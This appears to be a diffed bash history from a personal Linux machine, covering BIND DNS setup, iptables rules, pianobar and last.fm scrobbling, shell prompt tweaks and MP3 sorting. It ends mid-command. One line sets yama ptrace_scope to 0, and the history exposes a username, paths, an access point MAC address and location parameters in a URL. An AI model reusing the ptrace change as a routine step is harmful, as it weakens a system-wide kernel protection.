2pdf +sudo apt-get install pod2pdf webit2pdf +sudo apt-get install pod2pdf webkit2pdf +sudo apt-get install htmldoc +sudo ifdown eth0 +sudo ifconfig eth0 down +sudo ifup eth0 +sudo iptables -L -nvx +sudo ./bin/ipacct.sh update eth0 +sudo iptables -L -nvx +sudo ./bin/ipacct.sh update eth0 +sudo iptables -L -nvx +apt-cache search pdf +sudo apt-get install xmlto pstotext +sudo apt-get install pdftk pdfmod pdf2htmlex fig2ps +named -V +cat /etc/bind/named.conf +cat /etc/bind/named.conf.options +cat /etc/bind/named.conf.local +ls /etc/bind/named* +cat /etc/bind/named.conf.default-zones +ls /etc/bind/named* +sudo vim /etc/bind/named.conf.local +cat /etc/bind/named.conf.options +ip neigh +ip +ip dev wlan0 +ip netconf +ip link +ip +ip addre +ip addr +ip +ip addrl +ip route +ip +man ip +man ip-addresslabel +man ip-addrlabel +ip-addrlabel -l +ip addrlabel list +ip +ip -c addrlabel list +ip -c addrlabel list|xcol prefix label \:\: +ip -c addrlabel list|xcol prefix label \:\: \\ +ip -c addrlabel list|xcol prefix label \:\: \/ +ip -c addrlabel list|xcol prefix label \:\: / +vim .bashrc +alias _sed_ +set |less +vim .bashrc +less /etc/bash_completion +less /usr/share/bash-completion/bash_completion +type firef +type firefox +type wilo +type wiload.sh +less apt-linux-mint +have +_have +_have apt +ap +cat /etc/bind/named.conf.options +_sudo +_sudo ? +_sudo - +info _sudo +sev -x +set -x +_sudo +_sudo less /var/log/syslog +sudo vim /etc/bind/named.conf.local +jobs +ifonfig +ifconfig +route -n +ifconfig +sudo vim /etc/bind/named.conf.local +sudo vim /etc/bind/named.conf.options +jobs +set +x +l. /etc/bind +sudo rm /etc/bind/.named.conf.* +l. /etc/bind +vim /etc/bind/named.conf.o +vim /etc/bind/named.conf.options +log +qlog +wgets/cidr.html +man wgetq +wget --secure-protocol=autos/cidr.html +wgets/cidr.html +diff cidr.html cidr.html.1 +less cidr.html +rm cidr.html.1 +mkdr www +mv cidr.html www +mv www cidr.html +mkdir www +mv cidr.html www/ +git add www/cidr.html +git commit -m "added local www/citr.html" +git push +links www/cidr.html +jobs +l. /etc/bind +sudo vim /etc/bind/named.conf.options +sudo vim /etc/bind/named.conf.local +sudo named-checkconf +sudo vim /etc/bind/named.conf.local +sudo named-checkconf +sudo vim /etc/bind/named.conf.local +ll /var/log/named/ +lh /var/log/named/ +nslookup trimet.org localhost +sudo vim /etc/bind/named.conf.options +sudo systectl restart named +sudo systectl restart bind9 +sudo systemctl restart bind9 +nslookup trimet.org localhost +sudo vim /etc/bind/named.conf.options +sudo systemctl restart bind9 +nslookup trimet.org localhost +nslookup www.trimet.org localhost +sudo vim /etc/bind/named.conf.options +pkill -QUIT evolution +sudo systemctl start bind9 +sudo vim /etc/bind/named.conf.local +sudo named-checkconf +sudo systemctl restart bind9 +nslookup cnn.com localhost +nslookup clock.xmission.com localhost +nslookup slashdot.org localhost +nslookup www.nytimes.com localhost +sudo iptables -L -nvx +nslookup www.wired.com +nslookup www.wired.com localhost +nslookup www.nbc.com localhost +nslookup www.cbs.com localhost +nslookup www.businessinsider.com localhost +nslookup www.ebay.com localhost +nslookup www.amazon.com localhost +nslookup www.nike.com localhost + +sudo rndc stats +sudo less /var/cache/bind/named.stats +sudo vim /etc/bind/named.conf.options +sudo rndc reload +man rndc +sudo rndc reload +sudo systemctl reload bind9 +sudo named-checkconf +sudo vim /etc/bind/named.conf.options +sudo named-checkconf +sudo systemctl reload bind9 +sudo rndc status +nslookup www.amazon.com localhost +h|grep nslookup +nslookup www.nytimes.com localhost +nslookup www.wired.com +nslookup www.wired.com localhost +nslookup www.cnet.com localhost +sudo vim /etc/bind/named.conf.options +sudo named-checkconf +sudo rndc reload +nslookup www.cnet.com localhost +sudo vim /etc/bind/named.conf.local +sudo rndc trace 2 +sudo rndc trace 3 +nslookup www.dyn.com localhost +nslookup www.fbi.gov localhost +nslookup ns1.cnn.com localhost +nslookup awsdns.com +nslookup awsdns.com localhost +sudo rndc notrace +less /etc/bind/roots +dig novell.com +dig novell.com localhost +nslookup novell.com localhost +sudo vim /etc/iptables/rules.v4 +nslookup novell.com localhost +nslookup www.novell.com localhost +nslookup www.godaddy.com localhost +nslookup www.nist.org localhost +nslookup www.nist.gov localhost +nslookup www.samsung.com localhost +nslookup www.microsoft.com localhost +nslookup www.sony.com localhost +nslookup +nslookup localhost +man nslookup +ll /etc/resolv.conf +ll /var/ +ll / +ll /|xcol run +mount|xcol run +apt-cache search pandora +pianobar +sudo apt-get install pianobar +sudo apt-get install pianobar --install-suggested +man apt-get +sudo apt-get install pianobar --install-suggests +man pianobar +sudo updatedb +less config +less ~/git-repos/pianobar/contrib/config-example +man pianobar +pkill -QUIT pianobar +man pianobar +pianobar +pianobar +pkill -QUIT pianobar +jobs +pianobar --help +pianobar +pkill -QUIT pianobar +h|grep git +git clone --depth 1 +less config-example +mpkir -p ~/.config/pianobar +mkdir -p ~/.config/pianobar +cp config-example ~/.config/pianobar/config +less config-example +vim config +sudo netstat -plant +sudo netstat -plat +sudo netstat -pla +man pianobar +less config +man pianobar +cat config +mkfifo pianobar-pipe +vim config +less ~/git-repos/pianobar/contrib/config-example +tty sane +stty sae +stty sane +less ~/git-repos/pianobar/contrib/config-example +less ~/.bashrc +tput sgr0 +less ~/git-repos/pianobar/contrib/config-example +vim config +pianobar +vim config +la +rm .config.un~ +less ~/.bashrc +man ansi +man -j absu +man -k ansi +man signal +vim config +pkill -1 pianobar +vim config +ls DOOMICIDE\ darkocean +pkill -QUIT pianobar +man pianobar +h|git +h|grep git +git clone -depth 1sas/xcolors xcolors +git clone --depth 1sas/xcolors xcolors +less DOOMICIDE\ darkocean +locate XResources +less x11-common +less requirements.txt +ls xcolor +less Procfile +less README.md +vim ~/.Xresources +ls xcolor +ls templates/ +ls themes/ +vim ~/.Xresources +ls themes/ +ls -al +l. +sudo systemctl stop smbd +sudo systemctl stop nmbd +sudo systemctl stop avahi +l. +less .xsession-errors +qlog +sudo tail -f /var/log/named/named.log +sudo tail -f /var/log/named/named-error.log +sudo su - +file .bash_history +h|dig +h|grep dig +sudo su- +sudo su - +vim .bash_aliases +. .bash_a +. .bash_aliases +qlog +sudo ifup eth0 +sudo ./bin/ipacct.sh setup eth0 +ip neigh +log +pianobar +man pianobar +less /etc/DIRCOLORS +less .dircolors +less buildsuite +;;following numeric codes: +blue 35=magenta 36=cyan 37=white +TERM kterm +TERM linux +TERM linux-c +TERM mach-color +TERM mach-gnu-color +TERM mlterm +less LS_COLORS +less /etc/DIRCOLORS +less .dircolors +dircolors --print-database +dircolors -p +man dircolors +man pianobar +less .dircolors +man pianobar +vim .config/pianobar/config +pkill -QUIT pianobar +vim .config/pianobar/config +vim ~/git-repos/pianobar/contrib/config-example +vim .config/pianobar/config +pkill -QUIT pianobar +vim .config/pianobar/config +pkill -QUIT pianobar +vim .config/pianobar/config +man pianobar +vim .config/pianobar/config +wgetst/greatest-hits-gods-favorite-band-explicit/21-guns/TRz2vkg94wJkZxK?dc=232&ad=1:50:1:98108::0:0:0:0:819:039:WA:53033:0:0:0:0:0:1 +wgetst/greatest-hits-gods-favorite-band-explicit/21-guns/TRz2vkg94wJkZxK?dc=232\&ad=1:50:1:98108::0:0:0:0:819:039:WA:53033:0:0:0:0:0:1 +ls -l +file TRz2vkg94wJkZxK\?dc\=232 +less TRz2vkg94wJkZxK\?dc\=232 +ll +rm TRz2vkg94wJkZxK\?dc\=232 +rm TRz2vkg94wJkZxK\?dc\=232\&ad\=1\:50\:1\:98108\:\:0\:0\:0\:0\:819\:039\:WA\:53033\:0\:0\:0\:0\:0\:1 +vim .config/pianobar/config +git add .config/pianobar/config +git commit -m "added pianobar config" +git push +vim .config/pianobar/config +sudo vim /etc/bind/named.conf.local +sudo vim /etc/bind/named.conf.options +sudo named-checkconf +sudo vim /etc/bind/named.conf.options +sudo named-checkconf +sudo vim /etc/bind/named.conf.local +sudo named-checkconf +sudo vim /etc/bind/named.conf.local +sudo named-checkconf +sudo rndc reload +sudo su - +mkdir .config/Audio\:\:Scrobbler +ll .config/ +touch .config/Audio\:\:Scrobbler/scrobbler-helper.conf +ln -sn ./.config/Audio\:\:Scrobbler/scrobbler-helper.conf .scrobbler-helper.conf +l. +sudo mandb +perldoc Audio::Scrobbler +man 1 scrobbler-helper +vim .scrobbler-helper.conf +less eventcmd.sh +less scrobble.py +pip help +pip search pyLast +pip download pyLast +file six-1.11.0-py2.py3-none-any.whl +rm six-1.11.0-py2.py3-none-any.whl +la +rm pylast-2.1.0-py2.py3-none-any.whl +cp scrobble.py ~/.config/pianobar/ +sudo pip install pyLast +pip install pyLast +ls ~/.local/lib/python2.7/site-packages/pip +ls ~/.local/lib/python2.7/site-packages/ +l. +less pyvenv.cfg +ls bin/ +ll bin/ +pip install pyLast +h|grep pip +ls share/ +less README +lss +l. +less activate +less easy_install +source /home/bjohnston/env/mine/bin/activate +pip install pyLast +pip install --upgrade pip +deactivate +sudo updatedb +locate pyLast +locate last +less INSTALLER +less METADATA +less RECORD +less WHEEL +less scrobble.py +git clone --depth=1st/pylast pylast +l +less INSTALL +sudo python setup.py install +less scrobble.py +updatedb +sudo updatedb +locate pylast +ls build/ +ls -lR build/ +ls -lR dist/ +ls -lR pylast +ls -lR pylast.egg-info/ +less pylast.egg-info/PKG-INFO +ls -lr pylast.egg-info/ +ls -lR tests/ +less -lR tests/test_pylast.py +less example_test_pylast.yaml +less tox.ini +l +less setup.cfg +less clonedigger.sh +ls pylast +less pylast/__init__.py +git clone --depth=1stfm-tools lastfm-tools +less scrobble.py +less README.md +less mylast.py +less requirements.txt +less README.md +l. +less mylast.py +less MANIFEST.in +qls +less setup.py +ls pylast +la pylast +less pylast/__init__.py +ls git-repos/lastfm-tools/ +less git-repos/lastfm-tools/mylast.py +vin hash.y +vim hash.py +chmod hash.py +chmod +x hash.py +./hash.py +vim .bashrc +vim .bashrc +llo +less .bashrc +s +./hash.py +vim hash.py +./hash.py +vim hash.py +set|xcol lastfm +set|grep -i last +unset LASTFM_PASSWORD_HASH +unset LASTFM_USERNAME +set|grep -i last +./hash.py +vim hash.py +./hash.py +vim .bashrc +less .bashrc +vim hash.py +set|grep -i last +vim hash.py +vim .bashrc +nslookup www.google.com +nslookup www.cnn.com +vim .bashrc +less pylast.py +less scrobble.py +set |grep -i last +./hash.py +./scrobble.py +less scrobble.py +less mylast.py +set |grep -i last +less README.md +less scrobble.py +ls ~/git-repos/lastfm-tools/ +less scrobble.py +ls +less example_test_pylast.yaml +less test_user.py +less test_pylast.py +source ~/.bashrc +set |grep -i last +less test_pylast.py +./test_pylast.py +ls pylast +ls dist/ +ls build/ +less mylast.py +./mylast.py +chmod +x mylast.py +./mylast.py +chmod +x scrobble.py +./scrobble.py +less ./scrobble.py +./scrobble.py "Ed Sheeran - Thinking Out Loud" +man -k scrobble +perldoc Audio::Scrobbler +perldoc scrobbler-helper +perldoc Audio::Scrobbler +less dmenu.pl +less eventcmd.sh +less multi.sh +less rbot.rb +less scrobble.py +less pianobar.1 +less headless_pianobar +pkill -QUIT pianobar +less headless_pianobar +less config-example +less addshared.sh +less remote.sh +ls addshared.sh +ls eventcmd-examples/ +less eventcmd-examples/dmenu.pl +ls eventcmd-examples/ +perldoc Audio::Scrobbler +sudo apt-get update +sudo apt-get upgrade +sudo apt-get install lastfmsubmitd +apt-cache search lastfm +apt-get install pidgin-lastfm +sudo apt-get install pidgin-lastfm +apt-cache search scrobb +sudo apt-get --purge remove python-lastfm +sudo apt-get install python3-pylast scrobble-cli +sudo mandb +man -k scribbler +man -k scrobble +man scrobble-cli +man -k scrobble +man -k pylast +man -k last +man scrobble-cli +man pylast +man -k pylast +sudo updatedb +locate pylast +ls|grep pylast +less pylast.py +cp pylast.py ~/.config/pianobar +less scrobble.py +chmod +x *.py +rm scrobble.py~ +rm config~ +l. +rm .config.un~ .scrobble.py.un~ +l. +vim config +l. +rm .config.un~ config~ +l. +pkill -QUIT pianobar +vim config +wiload.sh +sudo ifdown eth0 +sudo ifup eth0 +pkill -QUIT pianobar +less lsb_release.py +less BeautifulSoupTests.py +less BeautifulSoup.py +l. +zcat changelog.Debian.gz |less +sudo mandb +man pylast +man -k pylast +ls py +ll|grep last +ls doc/python3-pylast/ +file pylast-1.0.0.egg-info +less pylast-1.0.0.egg-info +less slip-0.6.1.egg-info +less pylast.py +sudo updatedb +locate *~ +rm hash.py~ +ls .config/pianobar/ +l. .config/pianobar/ +rm .config/pianobar/config~ .config/pianobar/.config.un~ +file .config/pianobar/pylast.pyc +file .config/pianobar/state +less .config/pianobar/state +dmesg +sudo dmesg +dmesg +less README.md +l +ls eventcmd-examples/ +less eventcmd-examples/eventcmd.sh +ls eventcmd-examples/ +less eventcmd-examples/multi.sh +ls eventcmd-examples/ +less eventcmd-examples/scrobble.py +less headless_pianobar +less remote.sh +less eventcmd-examples/eventcmd.sh +man pianobar +echo -n '+' > ~/.config/pianobar/pianobar-pipe +man pianobar +echo -n '+' > ~/.config/pianobar/pianobar-pipe +sudo netstat -plat|less +sudo netstat -pla|less +sudo iptables -L -nvx +man pianobar +echo -n '+' > /home/bjohnston/.config/pianobar/pianobar-pipe +vim .bash_aliases +. .bash_aliases +alias +vim .bash_aliases +. .bash_aliases +alias +luv +luv +inc +luv +inc +luv +inc +sudo iptables -L -nvx +inc +luv +vim ~/.config/pianobar/config +luv +vim ~/.config/pianobar/config +luv +vim ~/.config/pianobar/config +sudo vim .bash_aliases +. ./.bash_aliases +stp +alias +stp +pkill -QUIT pianobar +inc +la +cat .config.un~ +less config~ +less ~/.dircolors +less /etc/DIRCOLORS +la +rm .config.un~ +file state +less state +pianobar +pianobar +less .dircolors +pianobar +echo -en " + + + +Hello" +inc +luv +vim .config/pianobar/config +luv +vim .config/pianobar/config +less .bashrc +man tput +less .bashrc +man -k setaf +man tput setaf +info tsig +man -k tsig +man -k tput +man terminal-colors.d +man -k tput +~ +man tput +less .bashrc +man tput +man profiles +man tput +man profiles +man profile +man tput +man 5 profile +man -k tput +man -k profile +less .bash_profile +less .bashrc +luv +man tut +man tput +luv +man tput +luv +man tput +man eval +info eval +man bash +less .bash_profile +man - eval +man -k eval +man expr +man bash +vmim .bashrc +vim .bashrc +which mint-fortune +vim .bashrc +ps aux|less +pkill -QUIT evolution +ps aux|less +man moc +sudo ifdown eth0 +sudo ifup eth0 +sudo su - +grep xfini .bash_history +h|grep xfin +sudo su - +h|grep -i xfin +sudo ifup eth0 +sudo ifdown eth0 +sudo ifup eth0 +less bin/wiload.sh |grep -i xfinity|less +sudo iwconfig wlan0 essid "xfinitywifi" mode Managed channel 6 ap 06:1D:D5:70:E1:90 +login +sudo systemd restart wpa_supplicant +sudo systemd reload wpa_supplicant +sudo systemd status wpa_supplicant +sudo systemctl status wpa_supplicant +sudo systemctl restart wpa_supplicant +sudo systemctl status wpa_supplicant +free +sudo dmesg +ip route +sudo ntop +sudo apt-cache search ntop +cowsay -f small +sudo dpkg-reconfigure logind +ps aux|grep login +dpkg -l |grep login +sudo apt-get install --reinstall login +sudo dpkg-reconfigure login +login +sudo systeemctl restart login +sudo systemctl restart login +man apt-get +sudo systemctl apt-get --fix-broken +sudo apt-get --fix-broken +sudo apt-get install --reinstall --fix-broken login +sudo systemctl restart login +vim .bashrc +. .bashrc +fortune +man fortune +vim .bashrc +. .bashrc +login +. .bashrc +source .bashrc +vim .bashrc +man cowsay +jobs +ls /usr/share/doc/cowsay/ +ls /usr/share/doc/cowsay/examples/ +less /usr/share/doc/cowsay/examples/cowsay_randoma +less /usr/share/doc/cowsay/examples/cowsay_random +less /usr/share/doc/cowsay/examples +less /usr/share/doc/cowsay/examples/ +ls /usr/share/doc/cowsay/ +ls /usr/share/doc/cowsay/examples/ +cp /usr/share/doc/cowsay/ +cp /usr/share/doc/cowsay/examples/cowsay_random . +chmod +x cowsay_random +fg +. ../.bashrc +jobs +vim .bashrc +vim bin/cowsay_random +vim .bashrc +. .bashrc +clear;. .bashrc +vim .bashrc +. .bashrc +vim .bashrc +fortune -a +fortune -a | bin/cowsay_random +less .bashrc +$(tput bold +less .bashrc +set|grep -i gmout +set|grep -i tmout +unset TMOUT +set|grep -i tmout +vim .bashrc +less .bashrc +. .bashrc +vim .bashrc +head -300 /dev/urandom +head -300 /dev/urandom | cksum +man cksum +qfg +jobs +man tput +man tset +man tput +tput init +tput reset +tput col 0.0 +sudo ifup eth0 +sudo ./bin/ipacct.sh setup +log +sudo systemctl stop smbd +sudo systemctl stop bmbd +sudo systemctl stop nmbd +sudo systemctl stop slapd +sudo systemctl stop snmpd +sudo systemctl stop apache2 +sudo systemctl stop cups +cat /etc/hosts +route +sudo updatedb +sudo apt-cache search cowsay +sudo apt-get install cowsay +cowsay +man cowsay +apt-cache search music|less +which moc +moc +sudo apt-get install --reinstall mo +sudo apt-get install --reinstall mocc +sudo apt-get install --reinstall moc +moc +man moc +mocp /media/bjohnston/Acer/Users/bjohnston/Music +log +man setaf +unset TMOUT +grep TMOUT +set|grep -i tmout +which mint-fortune +echo -e "$blue$(/usr/bin/mint-fortune -a | ${HOME}/bin/cowsay_random)$normal" +vim bin/cowsay_random +man shuff +sudo apt-get install shuff +apt-cache searxh shuff +apt-cache search shuff +apt-cache search randomizer +apt-cache search random +sudo apt-get install rand +man rand +rand -N 1 -M 7 +man rand +less .bashrc +generate +vim .bashrc +. ./.bashrc +vim .bashrc +sudo systemctl stop [sn]mbd +sudo systemctl stop smbd +sudo systemctl stop nmbd +sudo systemctl stop apache2 +sudo systemctl stop slapd +ps aux +ps aux|less +sudo systemctl stop cupsd +ps aux|less +pkill -QUIT evolution +ps aux|lless +ps aux|less +sudo systemctl stop avahi +sudo systemctl stop snmd +sudo systemctl stop snm +sudo systemctl stop snmp +sudo systemctl stop snmp +mocp /media/bjohnston/Acer/Users/bjohnston/Music +qgem listx +gem list +man tem +man gem +gem help +gem help commands +gem check +gem help commands +sudo gem update +cat /proc/sys/kernel/yama/ptrace_scope +sudo echo 0 |> /proc/sys/kernel/yama/ptrace_scope +sudo su - +cat /proc/sys/kernel/yama/ptrace_scope +sudo iwconfig wlan0 essid "xfinitywifi" mode Managed channel 6 ap 06:1D:D5:70:E1:90 +man basedir +man -k basedir +man bash +apt-cache searxh basedir +apt-cache search basedir +sudo apt-get install libxdg-basedir1 libfile-basedir-perl +man basedir +man -k basedir +sudo apt-get install libxdg-basedir1 libfile-basedir-perl +man basedir +info basedir +basedir +base +locate base +locate basedir +man -k basedir +dpkg -l| grep basedir +apt-cache search basedir +dpkg -l|grep basedir +mopc +mocp +ls cache/ +man moc +zcat /usr/share/doc/moc/examples/config.example.gz > mocp.conf +man mocp +vim mocp.conf +chmod 700 mocp.conf +mv mocp.conf config +man mocp +rm *~ +rm .*~ +l. +mocp +ls .moc/ +ls Downloads/ +ls /media/bjohnston/Acer/Users/bjohnston/Music +unset TMOUT +man bash +mocp +ls bin/ +sudo iptables -l -nvx +sudo iptables -L -nvx +sudo iptables -L -nv +sudo iptables -i 1 -t FORWARD -s -j DROP +h|grep iptables +sudo su - +sudo iptables -t FORWARD -i 1 -s -j DROP +sudo cat /etc/iptables/rules.v4 +sudo iptables -I 1 FORWARD -s -j DROP +sudo iptables -I FORWARD 1 -s -j DROP +sudo iptables -L -nv +man bash +man tmux +which tmux +sudo apt-cache search tmux +which reptyr +apt-cache search reptyr +sudo apt-get install tmux reptyr +man reptyr +jobs +uset TMOUT +unset TMOUT +set|grep -i tmout +man history +mocp +ls -ltr +ls ../Pictures/ +ls .. +find . -type f -atime +1 -print +find . -type f -mtime +1 -print +find . -type f -ctime +1 -print +man find +find . -type f -ctime -1 -print +find ../ -type f -ctime -1 -print +find ../*.mp3 -type f -ctime -1 -print +find ../ -type f -name "*.mp3" -ctime -1 -print +find ../ -type f -name "*.mp3" -atime -1 -print +mv 01\ -\ If\ You\ Could\ Read\ My\ Mind.mp3 /media/bjohnston/Acer/Users/bjohnston/Music/ +vim ~/.bashrc +ps aux|grep vim +rm ../.bashrc.swp +vim ../.bashrc +ls /media/bjohnston/Acer/Users/bjohnston/Music +. ../.bashrc +vim ../.bashrc +. ../.bashrc +vim ../.bashrc +. ../.bashrc +vim ../.bashrc +. ../.bashrc +vim ../.bashrc +. ../.bashrc +vim ../.bashrc +. ../.bashrc +vim ../.bashrc +sudo apt-cache search vundle +sudo apt-cache search vim +sudo apt-get install vim-addon-manager +man vim-addon-manager +vim-addon-manager list +vim-addon-manager status show +vim-addon-manager status_show +vim-addon-manager s +man vim-addon-manager +man vim-registery +man 5 vim-registery +vim-registery +sudo apt-cache search vim-registery +dpkg -l gim +dpkg -l vim +apt-cache search vim +apt-cache search vim|less +sudo apt-get install --reinstall vim vim-common vim-doc vim-runtime +vim-registery +vim-addon-manager list +vim-addon-manager show +vim-addon-manager show|less +vim-addon-manager --elp +vim-addon-manager status +vim-addon-manager remove closetag +vim-addon-manager status +vim-addon-manager install closetag +vim-addon-manager status +vim-addon-manager status|grep inst +vim-addon-manager remove colors-sampler-pack editexisting justify matchit surround xmledit +vim-addon-manager install colors-sampler-pack editexisting justify matchit surround xmledit +vim-addon-manager status|grep inst +vim-addon-manager status +vim-addon-manager install python-indent nerd-commenter +vim-addon-manager ~ +man vim-addon-manager +sudo apt-cache search vim +sudo apt-get install vim-icinga2 vim-haproxy vim-puppet vim-syntastic vim-rails +vim-addon-manager ~list +vim-addon-manager list +vim-addon-manager list installe +vim-addon-manager list installed +vim-addon-manager installed +vim status +vim-addon-manager status +vim-addon-manager install syntastic rails puppet +vim-addon-manager status +man vim +ln -sn /media/bjohnston/Acer/Users/bjohnston/Music/ dir +mkdir -p dir/Pink\ Floyd/Another\ Brick\ In\ The\ Wall +ll dir/ +mkdir -p dir/Pink\ Floyd/Animals +mkdir -p dir/Pink\ Floyd/Dark\ Side\ of\ The\ Moon +ll i +ll dir/Pink\ Floyd/ +mv 01\ -\ In\ The\ Flesh_\ \(2011\ -\ Remaster\).mp3 dir/Pink\ Floyd/Another\ Brick\ In\ The\ Wall/ +mv 03\ -\ Another\ Brick\ In\ The\ Wall\,\ Pt.\ 1\ \(2011\ -\ Remaster\).mp3 dir/Pink\ Floyd/Another\ Brick\ In\ The\ Wall/ +mv 03\ -\ On\ The\ Run\ \(2011\ -\ Remaster\).mp3 dir/Pink\ Floyd/Another\ Brick\ In\ The\ Wall/ +mv 12\ -\ Another\ Brick\ In\ The\ Wall\,\ Pt.\ 3\ \(2011\ -\ Remaster\).mp3 dir/Pink\ Floyd/Another\ Brick\ In\ The\ Wall/ +mv 13\ -\ Goodbye\ Cruel\ World\ \(2011\ -\ Remaster\).mp3 dir/Pink\ Floyd/Another\ Brick\ In\ The\ Wall/ +mv \(Disc\ 2\)\ 01\ -\ Hey\ You\ \(2011\ -\ Remaster\).mp3 dir/Pink\ Floyd/Another\ Brick\ In\ The\ Wall/ +mv 01\ -\ Pigs\ On\ The\ Wing\ \(Part\ One\)\ \[2011\ -\ Remaster\].mp3 dir/Pink\ Floyd/Animals/ +mv 02\ -\ Breathe\ \(In\ The\ Air\)\ \[2011\ -\ Remaster\].mp3 dir/Pink\ Floyd/Dark\ Side\ of\ The\ Moon/ +mv 01\ -\ Speak\ To\ Me\ \(2011\ -\ Remaster\).mp3 dir/Pink\ Floyd/Dark\ Side\ of\ The\ Moon/ +ls dir/Pink\ Floyd/Dark\ Side\ of\ The\ Moon/ +mv dir/Pink\ Floyd/Another\ Brick\ In\ The\ Wall/03\ -\ On\ The\ Run\ \(2011\ -\ Remaster\).mp3 dir/Pink\ Floyd/Dark\ Side\ of\ The\ Moon/ +ls -ltr +iptables -L +sudo iptables -L +sudo iptables -L -t FORWARD +iptables -L FORWARD +sudo iptables -L FORWARD +sudo iptables -D FORWARD 1 +sudo iptables -L FORWARD +mv 11\ -\ Don\'t\ Leave\ Me\ Now\ \(2011\ -\ Remaster\).mp3 dir/Pink\ Floyd/Another\ Brick\ In\ The\ Wall/ +ls|grep mp3 +ls|grep mp3|head 6 +ls|grep mp3|head -6 +mv Kill\ Bill\ Nurse\ Whistle.mp3 tmp/ +ls|grep mp3 +mv *.mp3 dir/Pink\ Floyd/Dark\ Side\ of\ The\ Moon/ +ls dir/Pink\ Floyd/Dark\ Side\ of\ The\ Moon/ +mv 09\ -\ Brain\ Damage\ \(2011\ -\ Remaster\).mp3 dir/Pink\ Floyd/Dark\ Side\ of\ The\ Moon/ +ls dir/Pink\ Floyd/Another\ Brick\ In\ The\ Wall/ +mv *.mp3 dir/Pink\ Floyd/Another\ Brick\ In\ The\ Wall/ +ls|grep mp3 +mv *.mp3 dir/Pink\ Floyd/Another\ Brick\ In\ The\ Wall/ +y +mv *.mp3 dir/Pink\ Floyd/Another\ Brick\ In\ The\ Wall/ +celar +m0cp +mocp +mv *.mp3 dir/Pink\ Floyd/Another\ Brick\ In\ The\ Wall/ +mv Another\ Brick\ In\ The\ Wall/ The\ Wall +ls The\ Wall/ +ls ../../*.mp3 +mv *.mp3 dir/Pink\ Floyd/The\ Wall/ +ls dir/Pink\ Floyd/The\ Wall/ +mv \(Disc\ 2\)\ 09\ -\ Run\ Like\ Hell\ \(2011\ -\ Remaster\).mp3 dir/Pink\ Floyd/The\ Wall/ +mv \(Disc\ 2\)\ 10\ -\ Waiting\ For\ The\ Worms\ \(2011\ -\ Remaster\).mp3 dir/Pink\ Floyd/The\ Wall/ +mv \(Disc\ 2\)\ 13\ -\ Outside\ The\ Wall\ \(2011\ -\ Remaster\).mp3 dir/Pink\ Floyd/The\ Wall/ +rm *.mp2 +rm *.mp3 +ls dir/Pink\ Floyd/The\ Wall/ +cler +mocp +mkdir Elton\ John +mkdir White\ Lion +mkdir Genesis +mkdir dir/Great\ White +mv 10\ -\ When\ The\ Children\ Cry.mp3 dir/Great\ White/ +mv 06\ -\ Wait.mp3 dir/Great\ White/ +mv *.mp3 dir/Elton\ John/ +mkdir dir/Genesis/Platinum\ Collection +mkdir dir/Elton\ John/Greatest\ Hits\ Volume\ 2 +mkidr dir/Great\ White/Pride +mkdirr dir/Great\ White/Pride +mkdir dir/Great\ White/Pride +mv *.mp3 Pride/ +ls Pride/ +mv *.mp3 Greatest\ Hits\ Volume\ 2/ +mv *.mp3 dir/Genesis/Platinum\ Collection/ +ls dir/Genesis/ +man less +man -k TERMCAP_md +set|less +less .bashrc +ls /lib/terminfo/x/ +less /var/lib/gems/2.3.0/gems/rdoc-6.0.1/lib/rdoc/servlet.rb +sudo iptables -L +sudo iptables -L -nvx +sudo iptables -L -nv +sudo su - +h|grep FORWARD +sudo iptables -i 1 -t FORWARD -s -j DROP +sudo iptables -I FORWARD 1 -s -j DROP +man cbq +sudo su- +sudo su - +scp bjohnston@router:/tmp/rules . +scp root@router:/tmp/rules . +unset TMOUT +set|grep -i tmout +sudo su - +sudo vim /etc/init/control-alt-delete.conf +sudo su +q +ps aux|grep mco +ps aux|grep mopc +ps aux|grep mop +rop +top +ps aux|grep mocp +echo 'n' > /proc/4761/attr/exec +man grep +jobs +mv *.mp3 dir/Pink\ Floyd/Another\ Brick\ In\ The\ Wall/ +ls |grep mp3 +vim config +vim ~/.config/pianobar/config +vim config +less ../.bashrc +export BOLD=$(tput bold) +export DBLUE=$(tput setaf 4) +export BLUE="$BOLD$BLUE" +export NORMAL=$(tput sgr0) +vim config +less ../.LESS_TERMCAP +vim config +man moc +man -k popt +man lpoptions +apt-cache search popt +man -k popt +man moc +man uniq +man find +man uniq +find . -type f |sort -rn | uniq -d +find . -type f -printf "%s +" |sort -rn | +mocp +vim .bash_aliases +. .bash_aliases +alias +vim .bash_aliases +. .bash_aliases +alias +vim .bash_aliases +man find +vim .bash_aliases +mocp +strace fine +strace find +man find +strace find +man findst +strace find +strace find +rm The\ Fray\ -\ Look\ After\ You.mp3 +rm Lit\ -\ My\ Own\ Worst\ Enemy.mp3 +rm Plain\ White\ T\'s\ -\ Rhythm\ Of\ Love.mp3 +rm We\ The\ Kings\ -\ Check\ Yes\,\ Juliet.mp3 +rm All-American\ Rejects\ -\ Move\ Along.mp3 +rm Plain\ White\ T\'s\ -\ Hey\ There\ Delilah.mp3 +\rm Linkin\ Park\ -\ Numb.mp3 +\rm Fall\ Out\ Boy\ -\ Save\ Rock\ And\ Roll.mp3 +\rm Evanescence\ -\ Bring\ Me\ To\ Life +\rm Evanescence\ -\ Bring\ Me\ To\ Life\ \(Live\).mp3 +\rm OneRepublic\ -\ Secrets.mp3 +\rm Semisonic\ -\ Closing\ Time.mp3 +\rm Evanescence\ -\ Call\ Me\ When\ You\'re\ Sober.mp3 +\rm Panic\!\ At\ The\ Disco\ -\ I\ Write\ Sins\ Not\ Tragedies.mp3 +\rm Panic\!\ At\ The\ Disco\ -\ Miss\ Jackson.mp3 +\rm Hoobastank\ -\ The\ Reason.mp3 +\rm Plain\ White\ T\'s\ -\ 1\,2\,3\,4.mp3 +\rm Israel\ \'IZ\'\ Kamakawiwo\'ole\ -\ Over\ The\ Rainbow.mp3 +\rm Fall\ Out\ Boy\ -\ Thnks\ Fr\ Th\ Mmrs.mp3 +\rm Good\ Charlotte\ -\ The\ Anthem.mp3 +\rm Fall\ Out\ Boy\ -\ I\'m\ Like\ A\ Lawyer\ \(Me\ \&\ You\).mp3 +\rm Jason\ Mraz\ -\ I\'m\ Yours.mp3 +\rm Simple\ Plan\ -\ Welcome\ To\ My\ Life.mp3 +\rm Red\ Hot\ Chili\ Peppers\ -\ S* +\rm 3\ Doors\ Down\ -\ Kryptonite.mp3 +\rm Fall\ Out\ Boy\ -\ Sugar\,\ We\'re\ Goin\'\ Down.mp3 +\rm Bowling\ For\ Soup\ -\ 1985.mp3 +\rm Ron\ Pope\ -\ A\ Drop\ In\ 